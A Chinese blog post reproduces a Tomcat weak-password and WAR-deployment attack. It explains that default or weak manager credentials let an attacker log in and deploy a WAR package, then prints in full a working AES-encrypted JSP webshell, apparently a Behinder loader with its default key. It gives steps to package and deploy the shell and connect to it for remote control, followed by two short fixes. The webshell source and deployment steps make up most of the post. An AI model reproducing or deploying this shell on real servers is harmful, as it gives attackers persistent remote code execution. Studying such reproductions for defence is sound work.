tomcat弱口令&war远程部署

1.漏洞原理

  在tomcat8环境下默认进入后台的密码为tomcat/tomcat,未修改造成未授权即可进入后台,

或者管理 员把密码设置成弱口令, 使用工具对其进行穷举。得到密码后,也可以进行后台上

传恶意代码控制服务器。

2.漏洞复现

 

 

 找上传点,部署war包,将shell.jsp打成压缩包,然后将zip改成war,jsp马如下:

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

 

 

 访问:http://192.168.4.164:21524/shell/shell.jsp

用冰蝎连接,获得webshell

 

 3.修复建议

  a.设置强口令 conf/tomcat-users.xml

  

 

  b.删除manger文件

posted @   kalibb  阅读(324)  评论(0编辑  收藏  举报
相关博文:
· Tomcat弱密码导致getshell
· Tomcat 远程代码执行漏洞(CVE-2017-12615)
· Tomcat7+ 弱口令 && 后台getshell漏洞
· tomcat漏洞复现
· Vulfocus靶场 | tomcat-pass-getshell 弱口令
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快?
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
点击右上角即可分享
微信分享提示
AI IDE Trae